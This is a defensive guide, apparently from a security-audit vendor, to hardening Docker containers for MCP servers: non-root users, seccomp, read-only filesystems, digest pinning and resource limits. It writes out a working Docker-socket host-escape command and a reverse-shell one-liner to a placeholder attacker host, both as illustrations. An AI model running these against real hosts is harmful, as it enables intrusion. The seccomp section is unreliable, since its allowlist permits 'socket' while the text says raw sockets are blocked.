Topic: mcp server docker security
MCP server Docker security — hardening containers for MCP server deployments
Running an MCP server in Docker does not automatically provide security isolation. A root container, an unscanned image, missing seccomp/AppArmor profiles, exposed Docker socket, or a base image with known CVEs can mean that an exploited tool handler escapes the container entirely — or that an attacker who reaches the container gains the same privileges as root on the host.
The root container problem
Docker containers run as UID 0 (root) by default unless the Dockerfile explicitly adds and switches to a non-root user. This default is convenient during development and catastrophic in production. If a vulnerability in an MCP server tool handler — a path traversal, a server-side request forgery that pivots to an internal service, or a deserialization flaw — lets an attacker execute arbitrary code inside the container, that code runs as root inside the container namespace.
With a root container, the blast radius of any code execution vulnerability is significantly wider: root can read and write any file in the container filesystem, manipulate network interfaces, load kernel modules if the capability is available, and exploit container escape vulnerabilities that are only reachable from UID 0. Running as a non-root user does not prevent container escapes via kernel exploits, but it eliminates the entire class of privilege-dependent escapes and dramatically reduces what an attacker can do if they remain contained.
# Dockerfile: hardened non-root MCP server (Node.js example)
# Stage 1: install dependencies as root (required for npm ci)
FROM node:20-alpine AS deps
WORKDIR /build
COPY package.json package-lock.json ./
RUN npm ci --ignore-scripts --omit=dev
# Stage 2: production image with non-root user
FROM node:20-alpine AS runner
# Create a non-root user and group with no home directory and no shell
RUN addgroup --system --gid 1001 mcpserver && \
adduser --system --uid 1001 --ingroup mcpserver --no-create-home mcpserver
WORKDIR /app
# Copy built dependencies and application source — owned by non-root user
COPY --from=deps --chown=mcpserver:mcpserver /build/node_modules ./node_modules
COPY --chown=mcpserver:mcpserver src/ ./src/
COPY --chown=mcpserver:mcpserver package.json ./
# Switch to non-root user before the ENTRYPOINT
USER mcpserver
EXPOSE 3000
ENTRYPOINT ["node", "src/index.js"]
The adduser --no-create-home flag ensures no home directory exists that an attacker could use to store tools or configuration. The shell is omitted (--shell /sbin/nologin is the default for system users on Alpine) so interactive access via the user account is not possible.
No-new-privileges and read-only filesystem
Two runtime flags significantly reduce what a compromised container can do, at essentially zero application cost for a well-behaved MCP server. --security-opt=no-new-privileges:true prevents any process inside the container from gaining additional privileges through setuid or setcap binaries — an attacker who finds a setuid binary in the container image cannot use it to elevate from the non-root user to root. --read-only mounts the container's root filesystem read-only, preventing an attacker from persisting tools, backdoors, or modified binaries after initial code execution.
# docker run with security hardening flags
docker run \
--security-opt=no-new-privileges:true \
--read-only \
--tmpfs /tmp:rw,noexec,nosuid,size=64m \
--user 1001:1001 \
--cap-drop=ALL \
--cap-add=NET_BIND_SERVICE \ # only if binding to port < 1024; omit if not needed
mcp-server:latest
# Kubernetes equivalent — securityContext in pod spec:
# securityContext:
# runAsNonRoot: true
# runAsUser: 1001
# runAsGroup: 1001
# readOnlyRootFilesystem: true
# allowPrivilegeEscalation: false
# capabilities:
# drop: ["ALL"]
The --tmpfs /tmp mount provides a writable, in-memory temporary directory that the application can use for scratch files — mounted with noexec to prevent executing binaries written there, and nosuid to prevent setuid interpretation. This covers the common case of MCP servers that need to write temporary files during tool execution without giving an attacker a persistent writable filesystem.
Seccomp and AppArmor profiles
Docker's default seccomp profile blocks approximately 44 system calls that are rarely needed by applications but frequently useful for exploitation — including ptrace, personality, keyctl, and add_key. For an MCP server whose runtime needs are well-defined (outbound HTTP, local filesystem reads/writes, no raw socket access, no process tracing), a custom seccomp profile can be significantly more restrictive than the Docker default, blocking system calls like mount, socket(AF_PACKET), clone with namespace flags, and unshare:
// mcp-server-seccomp.json — custom seccomp profile
// Allowlist only the syscalls an HTTP+filesystem MCP server needs
{
"defaultAction": "SCMP_ACT_ERRNO",
"architectures": ["SCMP_ARCH_X86_64", "SCMP_ARCH_AARCH64"],
"syscalls": [
{
"names": [
"read", "write", "open", "openat", "close", "stat", "fstat",
"lstat", "poll", "lseek", "mmap", "mprotect", "munmap", "brk",
"rt_sigaction", "rt_sigprocmask", "rt_sigreturn", "ioctl",
"pread64", "pwrite64", "readv", "writev", "access", "pipe",
"select", "sched_yield", "mremap", "msync", "mincore", "madvise",
"dup", "dup2", "nanosleep", "getitimer", "alarm", "setitimer",
"getpid", "sendfile", "socket", "connect", "accept", "sendto",
"recvfrom", "sendmsg", "recvmsg", "shutdown", "bind", "listen",
"getsockname", "getpeername", "setsockopt", "getsockopt",
"clone", "fork", "vfork", "execve", "exit", "wait4", "kill",
"uname", "fcntl", "flock", "fsync", "fdatasync", "truncate",
"ftruncate", "getcwd", "chdir", "rename", "mkdir", "rmdir",
"unlink", "readlink", "chmod", "getuid", "getgid", "getppid",
"getpgrp", "geteuid", "getegid", "setuid", "setgid",
"getrlimit", "getrusage", "sysinfo", "times", "gettimeofday",
"mknod", "statfs", "fstatfs", "futex", "sched_getaffinity",
"set_tid_address", "clock_gettime", "clock_nanosleep",
"epoll_create", "epoll_ctl", "epoll_wait", "epoll_pwait",
"inotify_init", "inotify_add_watch", "inotify_rm_watch",
"openat2", "statx", "rseq", "getrandom", "memfd_create",
"exit_group", "set_robust_list", "get_robust_list", "tgkill"
],
"action": "SCMP_ACT_ALLOW"
}
]
}
# Apply the custom seccomp profile at runtime
docker run \
--security-opt=seccomp=mcp-server-seccomp.json \
--security-opt=no-new-privileges:true \
mcp-server:latest
The key exclusions in this profile are ptrace (prevents a compromised process from attaching to other processes and reading their memory), mount (prevents mounting new filesystems, blocking several container escape techniques), and raw socket creation (blocks network packet crafting). Test the profile against your specific server before deploying to production — a missing syscall will manifest as an EPERM error that may crash the process or produce silent failures.
Image provenance and vulnerability scanning
Base image tags are mutable: node:20-alpine today and node:20-alpine next month may point to completely different image layers with different installed packages and different CVE profiles. Pin base images by digest to ensure your builds are reproducible and that a supply-chain attack against the base image does not silently change your production image:
# Unpinned (vulnerable): tag can point to a different image tomorrow
FROM node:20-alpine
# Pinned by digest (safe): immutable reference to a specific image layer set
FROM node:20-alpine@sha256:5c0b6a6e9f6c3a5e8f7d4b2c1a9e0f3d2b5c8a7e6f4d3b2a1c0e9f8d7b6a5c4
# In CI: scan every built image before pushing
- name: Scan image for CVEs
run: |
# grype: fail on CRITICAL or HIGH severity CVEs
grype mcp-server:${{ github.sha }} --fail-on critical
# docker scout (if using Docker Hub)
docker scout cves mcp-server:${{ github.sha }} \
--exit-code --only-severity critical,high
Integrate vulnerability scanning into the CI pipeline as a gate: a CRITICAL CVE in the base image should fail the build and block the push to the container registry, the same way a failing test blocks a merge. Schedule weekly re-scans of images already in the registry to catch newly published CVEs against pinned images.
Never mount the Docker socket
Mounting /var/run/docker.sock into a container is a complete privilege escalation path. Any process inside the container can connect to the Docker daemon via the socket and issue API calls to create new containers with --privileged or --pid=host flags — granting full access to the host's process namespace and filesystem. This is not a theoretical risk; it is a well-documented, trivially exploited, one-step host escape:
# The attack — requires only the Docker socket to be mounted:
# Inside the container, any process can do:
docker -H unix:///var/run/docker.sock run \
--privileged \
--pid=host \
--net=host \
-v /:/host \
alpine:latest \
chroot /host /bin/bash
# Result: root shell on the host
# Detection: check if the socket is mounted
docker inspect your-mcp-server-container \
--format '{{range .Mounts}}{{.Source}} -> {{.Destination}}{{println}}{{end}}' \
| grep docker.sock
# Any output here is a critical finding
MCP servers have no legitimate need to control Docker containers. If your MCP server needs to spawn sub-processes for tool execution, use a dedicated sandbox API (gVisor, Firecracker microVMs, or a dedicated container orchestration service with its own authentication) rather than exposing the Docker socket. If you need container orchestration from within the CI pipeline, use the Docker-outside-Docker pattern with a purpose-built API, not socket mounting.
Resource limits and PID namespace isolation
An MCP server without resource limits is vulnerable to denial of service via any tool handler that consumes unbounded memory or CPU — whether through a bug, a prompt injection attack, or deliberate abuse. Resource limits also contain the blast radius of a compromised process: a process limited to 512 MB of memory cannot allocate the gigabytes needed for certain memory-based kernel exploits.
# docker run resource limits
docker run \
--memory=512m \
--memory-swap=512m \ # equal to --memory disables swap usage
--cpus=1.0 \
--pids-limit=128 \ # limit number of processes/threads the container can spawn
mcp-server:latest
# Kubernetes resource limits — required in every container spec
# resources:
# requests:
# memory: "128Mi"
# cpu: "250m"
# limits:
# memory: "512Mi"
# cpu: "1000m"
Set --pids-limit to a value slightly above your server's expected thread count. An MCP server handling concurrent tool calls might need 50–100 PIDs. Limiting to 128 prevents fork bombs and limits the attacker's ability to spawn new processes after compromising the container. Never use --pid=host for MCP servers — sharing the host PID namespace gives the container visibility into and (with sufficient privileges) control over all processes on the host.
Minimal image with distroless
Standard base images (even Alpine) include a shell, a package manager, basic utilities like curl, wget, and tar, and coreutils. An attacker who achieves code execution in such a container has a full toolbox for post-exploitation: they can download additional tools, inspect the filesystem interactively, run shell scripts, and pivot to other services. Distroless images contain only the application runtime and its direct dependencies — no shell, no package manager, no debugging tools:
# Multi-stage build: compile in full image, deploy in distroless
FROM node:20-alpine AS builder
WORKDIR /build
COPY package.json package-lock.json ./
RUN npm ci --ignore-scripts --omit=dev
COPY src/ ./src/
# Final stage: distroless Node.js — no shell, no package manager
FROM gcr.io/distroless/nodejs20-debian12
# Pin the distroless image by digest in production
# FROM gcr.io/distroless/nodejs20-debian12@sha256:abc123...
WORKDIR /app
COPY --from=builder --chown=nonroot:nonroot /build/node_modules ./node_modules
COPY --from=builder --chown=nonroot:nonroot /build/src ./src
USER nonroot # distroless includes a 'nonroot' user at UID 65532
EXPOSE 3000
CMD ["src/index.js"]
# Note: distroless uses CMD with the entrypoint implicitly set to node
# No shell means CMD strings are exec'd directly, not passed through /bin/sh
Without a shell, an attacker who achieves remote code execution cannot run sh -c "curl ..." or bash -i >& /dev/tcp/attacker/4444 0>&1. They must operate through the Node.js runtime itself — significantly raising the skill and effort required for post-exploitation. Combine distroless with a read-only filesystem and seccomp profile for a layered defense that makes the container a genuine isolation boundary rather than a thin wrapper.
What SkillAudit checks
- container-runs-as-root — the Dockerfile does not include a
USERdirective, meaning the MCP server process runs as UID 0 inside the container, maximizing the impact of any code execution vulnerability. - no-seccomp-profile — the container is run without a custom seccomp profile, relying on Docker's default (which allows many syscalls unnecessary for an HTTP-based MCP server) or with seccomp disabled entirely.
- docker-socket-mounted —
/var/run/docker.sockis mounted into the MCP server container, providing a complete host escape path to any code running in the container. - unpinned-base-image-digest — the Dockerfile references a base image by tag without a digest pin, meaning the build is not reproducible and is vulnerable to base image substitution attacks.
- no-resource-limits — the container is started without memory, CPU, or PID limits, leaving the host vulnerable to denial-of-service from a misbehaving or compromised tool handler.
SkillAudit inspects your Dockerfile for USER directives and base image digest pins, analyzes your container orchestration configuration for security context settings and resource limits, checks for Docker socket volume mounts, and verifies that seccomp profiles are present and correctly structured for the MCP server's actual syscall requirements.
Check your Dockerized MCP server for container escape vectors.
Run a free audit →